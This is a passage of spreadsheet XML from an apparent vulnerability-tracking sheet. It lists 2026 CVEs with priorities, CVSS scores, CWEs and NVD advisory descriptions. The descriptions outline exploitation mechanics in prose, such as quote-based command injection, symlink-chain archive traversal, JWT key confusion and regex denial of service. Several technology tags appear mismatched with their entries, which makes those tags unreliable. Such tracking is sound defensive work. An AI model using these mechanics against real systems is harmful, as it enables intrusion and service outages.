      <c r="D311" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="inlineStr"/>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr">
        <is>
          <t>crowdstrike</t>
        </is>
      </c>
      <c r="K311" s="5" t="inlineStr"/>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S311" s="5" t="inlineStr">
        <is>
          <t>AiSOC versions 7.2.0 before 12.0.0 contain a command injection vulnerability in the actions service that builds CrowdStrike Real Time Response command strings by interpolating unescaped action parameters in crowdstrike_rtr.py and endpoint.py. Authenticated users can inject single quotes into file_path, path, script_name, or script_args parameters to break out of quoted arguments and execute arbitrary commands on managed endpoints with SYSTEM or root privileges.</t>
        </is>
      </c>
      <c r="T311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103056</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101894</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K312" s="5" t="inlineStr"/>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="S312" s="5" t="inlineStr">
        <is>
          <t>The decompress package for Node.js extracts archives. Prior to 10.2.2 and 11.1.4, the default decompress(input, output) API relies on lexical containment checks that do not account for the kernel following a planted symlink chain. An attacker can supply a crafted archive containing chained symlink entries so that a later entry resolves outside the output directory. This allows files outside output to be read or written, and overwriting startup scripts or configuration can lead to remote code execution. The maintained @xhmikosr/decompress package is fixed in 10.2.2 and 11.1.4, but the separately affected unmaintained decompress package remains unpatched through 4.2.1. This vulnerability results from a bypass of the incomplete hardening for CVE-2026-53486. @xhmikosr/decompress is fixed in versions 10.2.2 and 11.1.4.</t>
        </is>
      </c>
      <c r="T312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101894</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102268</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr">
        <is>
          <t>python, cryptography, go</t>
        </is>
      </c>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S313" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, is_pem_format in jwt/utils.py is affected because is_pem_format does not recognize every PEM representation accepted by the cryptography loader. This occurs when an application mixes HMAC and asymmetric algorithms and supplies a mutated public-key PEM as raw key bytes. As a result, HMACAlgorithm.prepare_key treats the unrecognized asymmetric public key as an HMAC secret. Consequently, an attacker who knows the public key can forge authenticated HMAC tokens. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102268</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97689</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="inlineStr"/>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr">
        <is>
          <t>urllib3</t>
        </is>
      </c>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr">
        <is>
          <t>pip:urllib3</t>
        </is>
      </c>
      <c r="M314" s="5" t="inlineStr">
        <is>
          <t>2.8.0</t>
        </is>
      </c>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr"/>
      <c r="P314" s="5" t="inlineStr"/>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S314"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314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97689</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67993</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="inlineStr"/>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S315" s="5" t="inlineStr">
        <is>
          <t>basecamp/upright at commit efe4f2e5254ac6e57e45d2261804cca74dbbca3f contains a login cross-site request forgery issue in the static credentials callback.</t>
        </is>
      </c>
      <c r="T315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67993</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95362</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="inlineStr"/>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K316" s="5" t="inlineStr"/>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S316" s="5" t="inlineStr">
        <is>
          <t>Cross-site request forgery in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95362</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100700</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="S317" s="5" t="inlineStr">
        <is>
          <t>nodemailer before 10.0.6 contains a denial of service vulnerability in the addressparser free-text fallback regex pattern that exhibits quadratic backtracking behavior. Attackers can supply crafted email header values with long whitespace-free runs to block the Node.js event loop for tens of seconds, causing service unavailability.</t>
        </is>
      </c>
      <c r="T317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100700</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.5 → 8.7)</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103043</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="inlineStr"/>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr">
        <is>
          <t>node.js, express, requests, gin</t>
        </is>
      </c>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S318" s="5" t="inlineStr">
        <is>
          <t>anchorme through 3.0.8 contains a regular expression denial of service vulnerability in the IPv6 host extraction regex due to catastrophic backtracking. Attackers can supply specially crafted input strings with repeated patterns to cause exponential regex engine backtracking, blocking the Node.js event loop and denying service to other requests.</t>
        </is>
      </c>
      <c r="T318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103043</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 8.7)</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61519</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="inlineStr"/>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr">
        <is>
          <t>vite</t>
        </is>
      </c>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S319" s="5" t="inlineStr">
        <is>
          <t>Liberu CRM 0.9.1 before 10.0.0 contains a broken access control vulnerability that allows any user holding a pending team invitation to invite additional attacker-controlled accounts with elevated privileges by exploiting a flawed authorization predicate in TeamPolicy::addTeamMember() that grants invitation rights based solely on the existence of a pending invitation email match. Attackers can send a POST request to the team-invitations route specifying the admin role for a second account, bypassing privilege-level validation in InviteTeamMember, causing the second account upon invitation acceptance to be attached to the team with full admin-level create, read, update, and delete access over all team-scoped data.</t>
        </is>
      </c>
      <c r="T319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61519</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100702</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K320" s="5" t="inlineStr"/>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S320" s="5" t="inlineStr">
        <is>
          <t>Nodemailer before 10.0.2 fails to properly flatten deeply nested arrays in recipient fields such as to, cc, and bcc, allowing attackers to cause stack exhaustion. Attackers can supply a deeply nested JSON recipient array that triggers recursive Array.toString() conversion, exhausting the call stack and terminating the Node.js process.</t>
        </is>
      </c>
      <c r="T320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100702</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95301</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="inlineStr"/>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S321" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Extensions in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95301</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95344</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="inlineStr"/>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S322" s="5" t="inlineStr">
        <is>
          <t>Race condition in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass site isolation via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95344</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95376</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="inlineStr"/>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K323" s="5" t="inlineStr"/>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>CWE-610</t>
        </is>
      </c>
      <c r="S323" s="5" t="inlineStr">
        <is>
          <t>Externally controlled reference in DevTools in Google Chrome prior to 154.0.8037.57 allowed an adjacent attacker leveraging social engineering to bypass system access restrictions via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95376</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97687</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="inlineStr"/>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr">
        <is>
          <t>urllib3</t>
        </is>
      </c>
      <c r="K324" s="5" t="inlineStr"/>
      <c r="L324" s="5" t="inlineStr">
        <is>
          <t>pip:urllib3</t>
        </is>
      </c>
      <c r="M324" s="5" t="inlineStr">
        <is>
          <t>2.8.0</t>
        </is>
      </c>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr"/>
      <c r="P324" s="5" t="inlineStr"/>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-440</t>
        </is>
      </c>
      <c r="S324"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324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97687</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102276</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K325" s="5" t="inlineStr"/>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S325" s="5" t="inlineStr">
        <is>
          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.19, 2.1.5, 3.0.7, and 5.0.10, crafted brace patterns can exhaust the native stack in parseCommaParts because parseCommaParts recursively processes the remainder once per brace group and uses push.apply to pass every element of a very large comma-part array as a function argument. Patterns containing many comma-separated brace groups trigger the recursive path, while the large array triggers the argument-array path without deep recursion. These paths cause recursive and argument-array native stack exhaustion before max or maxLength can limit output, potentially terminating the Node.js process in a process-terminating denial of service. This issue is fixed in versions 1.1.19, 2.1.5, 3.0.7, and 5.0.10.</t>
        </is>
      </c>
      <c r="T325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102276</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102278</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr">
        <is>
          <t>node.js, rust</t>
        </is>
      </c>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S326" s="5" t="inlineStr">
        <is>
